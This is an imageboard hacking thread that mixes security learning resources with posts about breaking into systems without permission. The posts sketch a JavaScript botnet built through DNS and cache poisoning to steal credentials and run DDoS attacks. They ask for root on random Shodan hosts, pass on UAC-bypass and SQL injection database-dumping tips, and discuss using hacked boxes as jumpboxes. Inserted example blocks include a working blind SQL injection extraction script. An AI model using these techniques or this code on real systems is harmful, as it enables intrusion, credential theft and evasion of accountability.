
sec - Cybersecurity

"There will come a time when it isn't 'They're spying on me through my phone', anymore. Eventually, it will be, 'My phone is spying on me.'"



File: hacking.jpg (64.43 KB, 704x445)

No.109

Anyone save the last one? Losing too much valuable info when these threads 404. They need to be archived or at least have a pastebin to reference so new threads can be created. Only one has been saved so far and it was from over a year ago!


Hijacking /g/'s hacking general since theirs seems to be more comprehensive:

How To Become a Hacker: http://catb.org/~esr/faqs/hacker-howto.html

Relevant Social Engineering thread:




Since this is a new thread, I'm more inclined to participate, since I'm already caught up.

I'm simply working on some moderately interesting projects and reading about computing, for the most part.

I mess around with my HP calculators often, so maybe I'll release a program here when I make something that could be useful to others.



File: 1441840448722.jpg (17.34 KB, 500x500)

What are some of the more useful tools in the Kali toolset that are worth learning?



Metasploit. Offensive Security offers a free course. (http://www.offensive-security.com/metasploit-unleashed)

I would also recommend Burp Suite if you want to break web apps.



>Frontend development
>Backend development
[Gist] backendDevelopmentBookmarks.md
>Useful tools
https://libraries.io/ - Discover new open source libraries, modules and frameworks and keep track of ones you depend upon.
>NEET guide to web dev employment
>How I Got a Job in Web Development
>Random Shit
Godly resource of thousands of PDFs
Decent videos if you wanna get some certs



File: 147338-1413265585259.jpeg (44.34 KB, 502x502)


With the exception of reversing tools the rest you can just google fu or read man pages on when you need them.



Thanks - from last OP of hacker generals



another good resource is
Python learning with hacking!



What are you wanting to learn?
wifi hacking?
web application hacking?





I tried this one and I am glad I did, first thing I ran across something I could actually make progress in, right now step 3 I guess, need to install some new software before proceeding. Seems very fun but not much information is there O.o still a lot of mystery, does anyone know more about this challenge?



File: NITROstudentV1.png (115.97 KB, 448x593)

U.S. Secret Service Network Intrusion Responder Program (NITRO) Course:



Anyone know if the OSCP course material is pirated somewhere? I can't find anything.



the course material is watermarked with your personal information, and they'll revoke your OSCP if they find your pirated shit.

>you have to scan your drivers license or passport and send them the scan to register

>can't register with a free email address

Currently taking the PWK/OSCP course, if you have any specific questions, reply to me or get at me on irc #lainchan (I'm udnid, it's not a randomly generated name)

To avoid the question from anyone, I will not give you a copy of any course materials. There's no s00p3r s3kr3t adv4nc3d hacking techniques.

Just go to vulnhub, do their shit, don't use metasploit when you're learning.
Enumerate the shit out of everything.




Basically what >>125 said.
The course book alone is so watermarked you'll never, EVER see anyone post it anywhere. You'll never be l33t until you drop dough on the learning material. You're stupid for even asking. Ain't nobody gonna give you that shit. It's so secret, you have to submit DNA (semen and/or blood) to Offensive Security. You'll never get. Never! Never ever!


Oh, oooooooh!

In all seriousness, most of the benefit of PWK comes from the lab environment and other supplementary materials like videos. The .pdf does have some solid info, though. Absorb some info, set up some labs, and learn.



Thanks lainon, we could try to make a downloadable home lab version that you can throw in your own VM software.



No problem, enjoy.

If you're looking to put together your own virtual lab, a simple Kali and Metasploitable setup running on your VM software of choice should work. With the Kali machine, you can work on your Linux and scripting skills. The Metasploitable machine gives you an ez-pz target to recon and attack from your Kali machine. Between the two machines, you should be able to work through most of the concepts, tools, and skills in the PWK .pdf (although you'll still be missing out on some things).



Seems like someone deleted my post (US GOVT at work), lainchan hacking group when?



What could be gained from working together as opposed to operating individually or as a loose collective?



File: 1468188784035.epub (11 MB, Practical Malware Analysi….epub)

I really enjoyed this book. It was also the first time I've been involved in using the Win32 API, despite being a coder for 10+ years.
Do you guys have more book recommendations regarding malware targeting Windows?



Separation of concerns.
A loosely knit collective would be a reasonable compromise. Is anyone here familiar with Goatse Security? (Goatsec)



The collection of skillsets. One might be interested in authentication systems, cryptography and algorithms, while the other might love logical errors in code. See what I mean?



Alright anons can you help me out with this one without actually giving me the answer?

I guess solution will involve spoofing the User-Agent field in the request header with Postman but don't know where to go from there.




That's literally it bruh.



But what do I put in there? I don't have the browser name. I feel like a fucking idiot



Set the User-Agent to 'SDSLabs'. It just checks that 'SDSLabs' is in the User-Agent string.
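Added example, mine rather than the thread's or the SDSLabs challenge's (the challenge's server code is not on the page): a local stand-in for a User-Agent check of the kind described in the reply above, plus a client that passes it without Postman by setting the header directly with urllib. The token 'SDSLabs' comes from the reply; the server, its port and its responses are constructed for the example.

```python
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

REQUIRED_TOKEN = "SDSLabs"   # the substring the challenge reportedly looks for


def ua_allowed(user_agent):
    """The check as the reply describes it: a plain, case-sensitive substring test."""
    return REQUIRED_TOKEN in (user_agent or "")


class UserAgentGate(BaseHTTPRequestHandler):
    """Constructed stand-in for the challenge endpoint."""

    def do_GET(self):
        ok = ua_allowed(self.headers.get("User-Agent"))
        body = b"welcome, SDSLabs user" if ok else b"wrong browser"
        self.send_response(200 if ok else 403)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, fmt, *args):
        pass   # keep the demo quiet


def build_request(url, user_agent=None):
    """Request with a spoofed User-Agent; urllib's default ('Python-urllib/x.y') otherwise."""
    req = urllib.request.Request(url)
    if user_agent is not None:
        req.add_header("User-Agent", user_agent)
    return req


def fetch_status(req):
    """HTTP status of the response, including the 4xx that urllib raises as an exception."""
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.getcode()
    except urllib.error.HTTPError as err:
        return err.code


def run_demo():
    """Start the stand-in on a random loopback port, hit it twice, return both statuses."""
    server = HTTPServer(("127.0.0.1", 0), UserAgentGate)
    url = "http://127.0.0.1:%d/" % server.server_address[1]
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        default = fetch_status(build_request(url))                        # rejected
        spoofed = fetch_status(build_request(url, "Mozilla/5.0 (compatible; SDSLabs)"))
        return default, spoofed
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(run_demo())   # (403, 200)
```

Anything that lets you set request headers (curl -A, Burp's repeater, Postman) does the same job; the point is that the header is entirely under the client's control, so a server that authorises on it is authorising nothing.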



File: 1431232240868.jpg (36.44 KB, 606x540)

File: 1431734305026.jpg (49.06 KB, 500x333)

>>109 (OP)
Hey guize, I know this is probably going to make me sound like a potato, but I've been trying to work with the liveCDs from PentesterLabs and none of the ones I've tried boot to any graphical interface and I can't find any of the actual content from cd'ing around.

I'm sure its just a simple fix, but any help would be appreciated.

For reference I'm using an Ubuntu 32-bit VirtualBox machine and I'm trying to start Web for Pentesters.



First make sure you're using a hypervisor, i.e. VMware, VirtualBox, etc. It's also not supposed to have a desktop.

Run the ifconfig command on the live ISO (make sure you set the network card on the VM).
You should get an IP. Now you should ping that machine from your attacking machine; if you get replies, that's good!

Now in your browser type "http://<ip address>/"
Now you're on the victim machine's website!
Good luck!
Msg me if you need any more help!




Are there any major differences between your current pdf and the one posted >>126

How are you finding the course so far? What's your study schedule like and how much lab time did you get?
I'm interested in taking the course but that price tag is pretty daunting, do you think you'll find easy employment once you grab the cert? Do you have a degree as well?



>do you think you'll find easy employment once you grab the cert? Do you have a degree as well?
maybe an entry-level tech job, but honestly pentesters in general are an oversaturated part of the security field, plus very few people would trust a "just got my cert".

That being said, most likely you will have to move up the ranks, or join the military and get training that way (I wouldn't recommend it though).



I have a couple years experience as a student linux sys admin. I'll finish my degree in Comp Sci next summer. I've been thinking about trying to get the OSCP before I graduate, hoping that it would help me land a security job out of college rather than having to make the sys admin to security pivot. What's been stopping me is the price and maybe moreso the time commitment, my last few semesters are going to be packed and I'll be working part time on top of it. I'm having real analysis paralysis picking between sys admin, security, or software dev.



>>109 (OP)
I think these should be in the general:


Phineas Fisher's write up of how they hacked Hacking Team.

Also OPSEC, everyone needs it!




fuck are all those ebooks from the old thread gone now? I checked the archive and got a 404. Fuck I took for granted that I could always come back here and get those books.



So I've been programming for a few years. I've done about a dozen of the microcorruption levels, read about half of the shellcoder's handbook, know basics of assembly and C, used to crack WEP with aircrack etc.

I feel like most people's interest in hacking wanes as they grow up and become better programmers and just want to make rails apps and live like a richfag in sanfran. I'm not really one of those people. What kind of mischief could I actually get into if I were so inclined? I don't really see myself creating my own exploits but what's like the next level above script kiddy? Years ago I read about someone operating a botnet and mining bitcoin with them. I know those days are long gone but running a botnet still sounds fun.




mmm the next level is probably still script kid but more like well educated script power user.

Example: using mitmf+dnslib+privoxy+apache mod_expire to create your own JS botnet by cache poisoning people at a coffee shop, or placing an open proxy on the net and letting all the other skiddies get infected.

JS payloads are mighty effective. Assume you've scripted your JS payload to pull actions from a C&C server and assume that your proxy is up for a good week and you've seen 5,200 people. Managing to dnsspoof code.jquery.com, 3,200 of those users are now running the modified version of the code b/c mod_expire tells their cache to keep jquery.js for 3 years.

All your clients pull the payload and run it... what can you do?

1. Steal credentials
2. Replace ads with your own and profit
3. embed youtube vids over adspace and sell views (this is a thing)
4. DDoS by consistently targeting a latent part of a webapp, such as consistently downloading a large file or a really complicated search query that has multiple table joins and poor use of globbing.
5. Attempt to use a precanned exploit and have a percentage of those users lend their computers completely to you.

so on and so forth. I think that would be a masterful approach of someone who's not the /best/ "hacker" but shows great intelligence and ingenuity in the way that you can combine pre-existing tools into your own unique attack vector.
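Added example, mine and not from the post above, on the defender's side of the scenario it describes: Subresource Integrity is what stops a poisoned copy of code.jquery.com/jquery.js from running even when a proxy or a 3-year cache lifetime hands it to the browser. The functions below compute an integrity token for a script body and apply the browser's verification rule to a fetched body. The script bytes are constructed for the example; in practice hash the real file.

```python
import base64
import hashlib
import hmac

# Algorithms SRI allows, weakest to strongest (browsers ignore anything else).
SRI_STRENGTH = {"sha256": 1, "sha384": 2, "sha512": 3}


def sri_hash(content, algo="sha384"):
    """integrity= token for a resource body: '<algo>-<base64 digest>'."""
    if algo not in SRI_STRENGTH:
        raise ValueError("SRI permits only sha256, sha384 or sha512")
    digest = hashlib.new(algo, content).digest()
    return algo + "-" + base64.b64encode(digest).decode("ascii")


def sri_verify(content, integrity):
    """Apply the browser's rule to a fetched body: of all well-formed tokens,
    keep only those using the strongest algorithm present, and accept the body
    if any of them matches. Returns False when no token parses (a real browser
    would then load the resource unchecked, which is the trap to avoid)."""
    tokens = []
    for tok in integrity.split():
        algo, sep, rest = tok.partition("-")
        if sep and algo in SRI_STRENGTH and rest.isascii():
            tokens.append((algo, rest.split("?", 1)[0]))  # '?options' are ignored
    if not tokens:
        return False
    strongest = max(SRI_STRENGTH[a] for a, _ in tokens)
    for algo, b64 in tokens:
        if SRI_STRENGTH[algo] != strongest:
            continue
        if hmac.compare_digest(algo + "-" + b64, sri_hash(content, algo)):
            return True
    return False


def script_tag(src, content):
    """The <script> element to ship: integrity pins the bytes, crossorigin is
    required for SRI on a cross-origin CDN such as code.jquery.com."""
    return ('<script src="%s" integrity="%s" crossorigin="anonymous"></script>'
            % (src, sri_hash(content)))


if __name__ == "__main__":
    # Constructed stand-in for the library body; hash the real file in practice.
    genuine = b"window.jQuery = function () {};"
    poisoned = genuine + b"\n/* injected payload */"
    pin = sri_hash(genuine)
    print(script_tag("https://code.jquery.com/jquery.js", genuine))
    print(sri_verify(genuine, pin), sri_verify(poisoned, pin))
```

The caveat is that SRI only protects pages that carry the attribute; a site that loads the CDN copy with a bare script tag is exactly the victim the post has in mind, and the pinned hash has to be updated whenever the site deliberately upgrades the library.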



How should I go about finding a box on Shodan that I can get root on? I just need root on a remote server.



Thanks a lot man, I was under the impression it would just be self-contained all in the VM, but I guess not.

So now I'm trying to set up port forwarding so I can access it because the ping isn't working.

I'm using VirtualBox and in the network settings for this particular VM have set:
Protocol to TCP
Host IP to the VM's IP from ifconfig
Host port to port 80
Guest IP to my own external IP from a "what's my IP" site
Guest port to port 80

For the guest IP I also tried my own local network IP but with these settings it doesn't return pings




To clarify, using my "whats my ip" addr doesn't work and the internal ip doesn't work.

The way I wrote it sounded ambiguous.



is your attacking machine on the same network as your victim?

you shouldn't need to set port forwarding.



>>150 is for >>148

I wouldn't recommend doing that; it's something skids do, and for legal reasons. However I also wouldn't recommend Shodan because that's for IoT. People who search for vuln sites would normally use Google dorks instead,
like a vuln software name in quotes or something not configured.



>>109 (OP)
Thanks for reviving.

Try creating a host-only network from File->Preferences->Network and putting both the attacker and target machines on it. Enable DHCP as well.

Worked for me at least. I'm following a walk-through from VulnHub, the one they say to start with.





Hey, thanks for sticking around, I figured it out.

I was trying to work out a NAT network but in the end I just set it up for host only adapter and everything worked out.
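Added example, not from the thread: the host-only setup the two posts above arrive at by hand, as a script. In VirtualBox's default NAT mode each VM sits behind its own private NAT, so the guests cannot reach each other and the port-forwarding rules tried earlier are the wrong tool; a host-only adapter with DHCP puts the attacking VM and the target on one virtual switch, which is also all the Kali plus Metasploitable lab described earlier needs. The VM names "kali" and "metasploitable", the adapter name vboxnet0 and the 192.168.56.0/24 range are assumptions; the VBoxManage subcommands are the standard ones.

```python
import ipaddress
import subprocess


def plan_hostonly_lab(ifname, vms, network="192.168.56.0/24"):
    """VBoxManage invocations, in order, that put every VM in `vms` on one
    host-only adapter with DHCP. Returns argv lists rather than running them
    so the plan can be inspected (or tested) before touching the hypervisor."""
    net = ipaddress.ip_network(network)
    hosts = list(net.hosts())
    if len(hosts) < 102:
        raise ValueError("network too small for this address layout")
    host_ip, dhcp_ip = hosts[0], hosts[1]      # .1 for the host, .2 for the DHCP server
    lower, upper = hosts[100], hosts[-1]       # .101-.254 handed out to the VMs
    mask = str(net.netmask)
    plan = [
        # The adapter itself must already exist: on a Linux host a single
        # `VBoxManage hostonlyif create` makes vboxnet0. It is not repeated
        # here because every call creates a fresh vboxnetN.
        ["VBoxManage", "hostonlyif", "ipconfig", ifname,
         "--ip", str(host_ip), "--netmask", mask],
        # `add` fails if a DHCP server already exists for the adapter; use
        # `dhcpserver modify` with the same options in that case.
        ["VBoxManage", "dhcpserver", "add", "--ifname", ifname,
         "--ip", str(dhcp_ip), "--netmask", mask,
         "--lowerip", str(lower), "--upperip", str(upper), "--enable"],
    ]
    for vm in vms:
        # nic1 moves to the host-only network; keep nic2 on NAT if a VM
        # still needs internet access for updates.
        plan.append(["VBoxManage", "modifyvm", vm,
                     "--nic1", "hostonly", "--hostonlyadapter1", ifname])
    return plan


def apply_plan(plan, dry_run=True):
    """Print the commands (dry run) or execute them, stopping on the first failure."""
    for argv in plan:
        if dry_run:
            print(" ".join(argv))
        else:
            subprocess.run(argv, check=True)


if __name__ == "__main__":
    # VM names are assumptions: rename to whatever `VBoxManage list vms` shows.
    apply_plan(plan_hostonly_lab("vboxnet0", ["kali", "metasploitable"]))
```

Run it with dry_run=False once the VMs are powered off; after booting both, ifconfig on the target should show a .101-.254 address that the Kali VM can ping and browse to, with no forwarding rules involved.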



There's been one for years, what do you bring to the table?



Has anyone ever attempted to mess with those digital business signs you see along the road? Not billboards, but signs for specific businesses.

There's one I see along my commute every day that seems like it might be something I could get into. It's too far from the business to be controlled from there, so I'm thinking there's a computer or something sitting in the access box on the side.



Would anyone like to team up and try to play some CTF maybe? We could arrange something on some random IRC channel.

Also see this: http://wechall.net
for more wargame sites.



Is the free version of Burp Suite worth using? I see that some cool features are only available in the paid version



Honestly, I never pay for tools in general, however paying for Burp is only useful if you plan on doing automated scans on huge networks and even then not really.

For every paid feature there are free tools too! That being said Burp is the go-to tool for manual web app testing!



I'm not advocating it, but if you bought a hardhat, tool belt, and a dirty white shirt no one would think twice, plus most of those machines have the instructions or a number you can call for help on the inside.



Two CTFs starting this weekend.
Palo Alto's having one, more info at http://labyrenth.com/

The second one's a ez-pz(?) high school level one. Info's at http://abctf.xyz/

Keeping track of these is helped by https://ctftime.org/



>>109 (OP)

OverTheWire's bandit challenge doesn't seem to work. I tried to ssh to the given URL but was only presented with a password. When I ssh'd it should have asked for a username and password, right?




Try to SSH into bandit0@bandit.labs.overthewire.org



Oh, and if it wasn't clear use bandit0 as the password when prompted for one. The bandit0 part of bandit0@bandit.labs.overthewire.org specifies your username you want to log in to. So, as you progress to level one you can log out of bandit0 and then SSH into bandit1@bandit.labs.overthewire.org with the password gained by poking around as bandit0.



Yeah I logged in perfectly fine now. Thank you



Anyone having problems at bandit6?
I'm an idiot



Use the find command. Look at the man page and check out the -size option.



So no one saved the last thread?



well, it's an imageboard. threads don't get saved..



Some other imageboards have automatic permanent and/or temporary archives, so I don't see your point. Seeing as this is a topic general, it makes sense that it would at least get saved somewhere for future reference.



This imageboard runs on PowerBook 180 and has 80MB of hard drive space.



Hmmm I've seen wget and powershell recommended elsewhere for archiving websites. If you're familiar with them, what would you recommend for personally automating thread archival? I've never had to use either before so whichever one is most straightforward is preferred.



>it's an imageboard. threads dont get saved
That kind of logic is completely flawed.
A lot of different imageboards have resource filled threads that are "generals" and cyclical, continuing on theme/topic of last thread, so if you start to read the middle of conversation you will be really dazzled and confused.
That's why a lot of people just save them with 3rd party sites like archive.is or even just CTRL + S
If you are however trying to insinuate that imageboards don't have capabilities and functions of saving threads, I would agree with you but for completely different reasons (I assume). But that wasn't the question >>167
asked. He simply asked if someone saved it.
I think that was "high quality post" what you guys would say, no?



I think it partially has to do with the tinfoil mentality that the cyberpunk scene can foster. They don't want the threads saved because then gubberment will find their sekrit haxxor techniques.



>then gubberment will find their sekrit haxxor techniques
I understand that you tried mocking here, but still the line of logic makes no sense.
People that are into the haxxor world understand that the gubberment has enough resources, time and goals to either invest in or to just buy out their own breed of super duper haxxors. In reality people that have brains already acknowledge that other people have brains too, there is no need for these pseudo-secrets that anyone can google for, and if you are trying to insinuate that the cyberpunk scene doesn't have good enough self-awareness then I don't understand what your thought process is, to be honest.
The bottom of the barrel of cyberpunk scene, yea even lainchan, can acknowledge that gubberment surveillance is pervasive and persistent and it won't go away until the whole system comes crashing down.
So, "tinfoil mentality" won't be directed at saving threads to help the little guy trying to have fun on his computer, but rather will be directed at cautionary way cybers act towards the gubberment.



I posted that because I have seen some lainons claim that it defeats the purpose of a chan, especially one of this nature. The cyberpunk scene does have good self awareness but it is still prone to tinfoiling with the topics at hand. I mean /g/ is just a regular tech community and it tinfoils often, justifiably or not.



>I have seen some lainons claim that it defeats the purpose of a chan, especially one of this nature
Well, you're moving the goalpost, but I would love to see where these lainons are, especially when I explained above how these resource filled informational threads are in dire need for people that want to re-read or people that are new to conversation and want to be up-to-date with topic at hand and with all info that was posted.

>still prone to tinfoiling with the topics at hand

I have no problem with tinfoiling, it's kind of natural that with more exchange of information (and wider accessibility of internet) we have come to point where we now know some of shady dirty things that governments and politicians do for their own or interests of their groups.
Just look at the Shillary mail scandal, I guess nobody really looked at it but most people are making a fuss about it. Why? Because she talked about how Syria needs to be taken down for Israel's interests (this was back in the early 2000s). Obviously a lot more players were involved in Syria, not just AIPAC and Shillary, but that alone makes you a little bit paranoid and cautious about what other shit might be going on, so the general rule of thumb is the "everything that can go wrong, will" kind of paranoia. So most people just try to keep 1-upping themselves over privacy and hacking paranoia, which in my opinion I have no problem with; it's in the best interest of everyone to be up to date and the best, so what's the downfall? A few schizos running around connecting dots? Big whoop

I found it on archive.is



How is that moving the goalpost? My observation was the basis for the post, not a diversion. Like I said it is not the only reason. it is probably a reason among several for the lack of an archive. I would show you where lainons said this when the issue of archiving was brought up, but I can't because the threads have disappeared due to the lack of an archive.

>inb4 unfalsifiable

Many would agree with you about the preservation of resource rich threads, and I certainly do, but that doesn't mean it is the consensus. Even if I don't wholly agree, there certainly is some merit to the argument of maintaining overall plausible deniability and having the onus on the individual to save the threads for themselves. Skepticism (which is different from tinfoiling) of the government is certainly healthy and rational as you have pointed out. Still, with semi-hivemind chan culture the way it is, it can become counterproductive irrational paranoia.

And that archive link you posted is in the OP. It is also not the previous thread, but the one before it. The previous thread was not saved, apparently.



if it's about needing resources, lets make a wiki



We just need a pastebin for the generals, and someone in charge of uploading dying thread generals to archive.is so they don't get lost forever. There are already enough resource wikis and aggregated cyberpunk sites out there.



Be the change you want to see in the Wired.



>My observation was the basis for the post, not a diversion
My wrong, it just seemed like you were trying to change the topic.

>>inb4 unfalsifiable

I trust you.

>maintaining overall plausible deniability

We are, on what I would like to believe is an anonymous imageboard, with the only ones capable of seeing our real identity being the chan owner and his friends with access to the server.
With that being said, plausible deniability is already ingrained in the anonymous nature of the imageboard, assuming that the letter soup agencies won't ask kalyx for any info. But even then, I assume most people here browse with Tor or some VPN.

>on the individual to save the threads for themselves

As I said, what if someone comes in the thread in middle of conversation? Can't he get info about past conversations?

>Still with semi-hivemind chan culture the way it is, it can become counterproductive irrational paranoia.

I guess we have different ideas of what "paranoia" is. You associate it (I assume) with circlejerking and shitposting around the scary idea and I associate it with that few anons that never say anything and that always are in the shadows, only coming out to talk about their paranoid thoughts and to overall build on that paranoid thought, whether that be through software or doxxing of officials and making connections.

>It is also not the previous thread, but the one before it. The previous thread was not saved, apparently

Welp, darn.

>let's make a wiki
We can do it through Wikia. I already have chosen the "Lainchan Hacking General" name. What do you think?

Wiki is kinda better, pastebins are clunky and unreadable in my opinion and wiki has better look overall in my opinion



You are correct on the anonymous posting and identity part. I meant more along the lines though of in the event the law enforcement or whoever swooped in only seeing a mostly innocent sci-fi fantasy discussion site rather than a subversive one due to lack of an archive. Keeping these threads uploaded to a public archive gives them too much of a track record to build a case, and helps them put more pressure on Kalyx and his friends who have low capacity and resources to resist. This helps keeps the site alive, and that's more what I meant by overall plausible deniability.

The circlejerking and shitposting where they blow everything way out of proportion and essentially fearmonger is what I associate tinfoiling with mostly. Like caricatures of Richard Stallman. I associate the latter of you referred to more with legitimate hacktivists though that scene can attract a few anarchists and nihilists which makes them seem tinfoil at times.

If we make a wiki we should go all out and make it a resource hub, not just for hacking. Have a programming section, hacking and social engineering section, etc. We can build off of other wikis.



if (line[0] == 1 && !strncasecmp (line + 1, "ACTION", 6))
{
    po = strchr (line + 8, '\001');
    if (po)
        po[0] = 0;
    inbound_action (sess, dcc->serv->nick, dcc->nick, "", line + 8, FALSE, FALSE);
} else
    inbound_privmsg (dcc->serv, dcc->nick, "", line, FALSE);

Find the flaw



>meant more along the lines though of in the event the law enforcement or whoever swooped in only seeing a mostly innocent sci-fi fantasy discussion site rather than a subversive one due to lack of an archive. Keeping these threads uploaded to a public archive gives them too much of a track record to build a case, and helps them put more pressure on Kalyx and his friends who have low capacity and resources to resist.

They would find who owns the physical server and just use digital forensics on it to recover everything deleted or overwritten. That being said, not having an archive would be a layer of security against OSINT

>The circlejerking and shitposting where they blow everything way out of proportion and essentially fearmonger is what I associate tinfoiling with mostly.

This is a big thing: people get so paranoid they become unproductive, and do more harm than good. It's good to be paranoid, bad to think zebra and not horse.

that being said it shouldn't matter because you wouldn't be posting your illegal actions on a PUBLIC web forum.

FBI and Europol didn't get lulzsec because of a vuln in Tor or software X, they got logs and used their conversations to identify where they lived.

not that you would do anything like that lainon



How can I go about "injecting" (I don't know if this is correct term) a Win32 program I've created into an admin process?

I need to get admin privileges/get around the UAC. I'm new to both systems programming and Win32 so I don't really know what terms to search for. The goal though is to not have to prompt for UAC.



What you're looking for I think is "escalation of privilege".
I don't know much about the subject but you should get a lot by looking through the info posted ITT or through a search engine



Haha somebody should hack their server to retrieve the last thread then. Jokes aside, is there any way of maintaining plausible deniability with a server on the clearnet besides aliases and such? Is the only alternative p2p networking?

From what I read they were able to take down lulzsec because they targeted a key leader who had a lot to lose in his personal life if he didn't cooperate. So if you want to be a real hacker you should be detached and distant with the other hackers in your group.



Depends on your attempted point of ingress

Look up Thread Local Storage injection that can allow you to inject and spawn a thread under another running process.






If it's just UAC you need to bypass then check out UACME:


Otherwise, you'll need a privesc exploit. These aren't impossible to find but finding one in vanilla Windows may take a fair bit of time. Your best bet is to exploit system-specific misconfigurations or other shifty software running on the target system.



What kind of jumpboxes do you peeps recommend? Ofc you could buy with bitcoin, but the anonymity of it could vary, depending on how you buy and use the bitcoins themselves. Is it a good idea to use already hacked boxes as jumpboxes?



File: 1469072600217.jpg (6.09 KB, 223x226)

Suppose there was a website with multiple sql injection points.
How would I go about dumping the database?

The only approach I came across is to add an and expression and use a conditional operator to extract the data char by char.
I imagine this to be very slow, there ought to be something faster.
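Added example, not from the thread: the "extract the data char by char with a conditional" approach the post describes is boolean-based blind injection, and the speed-up is to binary-search each character code instead of walking it linearly, about seven requests per character instead of up to 95; this is what sqlmap's boolean-blind mode does. The target below is a constructed in-memory SQLite database behind a deliberately injectable query, and SQLite's unicode()/substr()/length() stand in for MySQL's ascii()/substring()/length(). The table, column and secret value are all invented for the example.

```python
import sqlite3

SECRET = "s3cr3t-pa55"   # constructed value the attacker does not know


def build_target():
    """In-memory stand-in for the vulnerable site's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', ?)", (SECRET,))
    return db


def user_exists(db, name):
    """Deliberately vulnerable lookup: `name` is concatenated into the SQL.
    All the attacker observes is True/False (the page renders differently)."""
    sql = "SELECT id FROM users WHERE name = '" + name + "'"
    return db.execute(sql).fetchone() is not None


class BlindOracle:
    """Turns the injection point into a yes/no question and counts requests,
    which is what actually limits blind extraction against a live site."""

    def __init__(self, db):
        self.db = db
        self.requests = 0

    def ask(self, condition):
        self.requests += 1
        return user_exists(self.db, "admin' AND (" + condition + ") -- ")


def _bisect(oracle, greater_than, lo, hi):
    """Find v in [lo, hi] when the oracle can only answer 'value > n';
    one request per halving of the interval."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle.ask(greater_than(mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_length(oracle, expr, max_len=64):
    return _bisect(oracle, lambda n: "length(%s) > %d" % (expr, n), 0, max_len)


def extract_char(oracle, expr, pos):
    # unicode()/substr() are SQLite spellings; MySQL uses ascii()/substring().
    return chr(_bisect(oracle,
                       lambda n: "unicode(substr(%s, %d, 1)) > %d" % (expr, pos, n),
                       32, 126))   # search space: printable ASCII


def extract_string(oracle, expr):
    """Recover a string-valued SQL expression, e.g. a subquery, blind."""
    n = extract_length(oracle, expr)
    return "".join(extract_char(oracle, expr, i) for i in range(1, n + 1))


if __name__ == "__main__":
    oracle = BlindOracle(build_target())
    value = extract_string(oracle, "(SELECT password FROM users WHERE id = 1)")
    print(value, "recovered in", oracle.requests, "requests")
```

Against a real site the `ask` method becomes an HTTP request whose response is classified as true or false, and the same bisection recovers table names from the schema tables before it recovers rows; error-based or time-based oracles plug into the same loop when the page gives no visible difference.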




Yeah use OUTFILE to dump to a file in the server's static resource directory. Since most 'webapps' use routing for URL handling but define a static directory for images, CSS, and other non-dynamic elements. Then pick it up by navigating to that file, domain.xyz/static/dump.sql



make sure you're in incognito mode or the feds will bust you



I really hope you're joking...



Can anyone help me out with this?
I'm working on a web app, I can inject some SQL and upload PHP files but exec and system functions are disabled.
Any ideas how to escalate on the server?



File: 1329418108468.jpg (47.31 KB, 337x450)

I need your input, /cyb/. I'm sorry if I make some grammar mistakes, English isn't my native language.
I've been programming for about 5 years. I started at college and after 4 years I noticed how bad the education they offered was and how much they charged, so I left college. I've worked for a year as a Java developer but I quit. I did not enjoy working with front end, I am not good at it and I do not wish to work with that again. I have programming knowledge but nowhere near as much as I should have for someone who has been programming for so long. A few months ago I started studying math, back end and C++. I've learned a lot superficially, enough to know where I wish to specialize. I want to study encryption, security, hacking, reverse engineering and performance (query speed, execution speed etc.). Also I want to work remotely, since my experience in private and public corporations has not been good for me psychologically.
From this thread and previous knowledge I created a study routine, but I need the insight of more experienced people to know if this is a good plan to follow and if it's realistic to make money from this knowledge.

My current plan is:
Mathematics (I'm following 8ch's /prog/ sticky, currently in Serge Lang's Basic Mathematics);
Cybrary (A+, Linux, Networking, Security, Penetration testing, computer hacking forensics, Python for security professionals, advanced hacking, cryptography);
Offensive security classes (https://www.cs.fsu.edu/~redwood/OffensiveComputerSecurity/lectures.html)
Freecodecamp (freecodecamp.com)
Read Hacking: The Art of Exploitation;
Read https://trailofbits.github.io/ctf/index.html
Do http://www.primalsecurity.net/tutorials/python-tutorials/

Freecodecamp is mostly to have a way to make money in case everything goes wrong and I have nothing to eat. I don't expect to get much knowledge out of it, but they have lots of trendy technologies which would be useful to get a quick job; it's a failsafe. Keep in mind my goal isn't to gain illegal money, I just want to learn stuff that I enjoy and if I'm lucky make a living out of it from remote working and/or freelancing. Otherwise I will use it as a hobby and work at a mall or something; either way I wish to learn the stuff. Don't worry about logistics or discipline, I will split these into 2-hour chunks of study. I have already been doing that for a few weeks, I just didn't have any focused course. I'm aware this is very long term and that's exactly why I need someone else's experience before I put in tons of time on something that might not be any good.

Do you think this material is any good, would you change/add something to it? Do you think it's realistic to get a (remote) job from this sort of knowledge or make consistent money out of it, at least enough to pay for bills/food? I don't really wish to make an "official" career since I often don't feel comfortable in these environments.



In op's archive page, there's a link for another, older archive.




Yeah that was the first hacking thread. The OP archive was the second. The third wasn't saved and we are now on the 4th



Are there any public wargames/pen testing simulations similar to the OSCP labs/exam?



I just found these classes, they're from Owen Redwood, the guy from offensive computer security.


They seem to be MUCH more web-oriented than just a recorded college class, also they're fresher than the ones from 2014.



That requires FILE privileges (which are rarely granted) and a writeable directory (writeable to mysql, not http). If you manage to get OUTFILE working, you should just drop a shell.



Hey, I won't bump the thread since I've been posting a lot lately, but I found a pretty nice beginner's C tutorial if anyone is interested. It's exercise oriented.




I've done about half of this tutorial, it's pretty good but some people really hate Zed Shaw.



I hate his personality, he's a really annoying cunt who's probably impossible to work with. I don't think that really affects his work though, except that sometimes he's a bit prepotent even in his writing, but other than that...Can't really say anything about his technical knowledge.



You can find a torrent of the course booklet but it's a couple years out of date. (The one I have is for BackTrack.)

Much of it is still relevant though.
At the very least it's a good starting point for those of us interested in the course but too damn broke to just buy it without first getting our footing.

You can find it with a simple search on your favorite tracker.



Bump on this question.
Tor is a nice network but it's too slow and doesn't do UDP, so my preferred method would be using jumpboxes.

Me -> TOR -> Jumpbox -> Target

The important thing is that the jumpbox cannot be used to identify me.



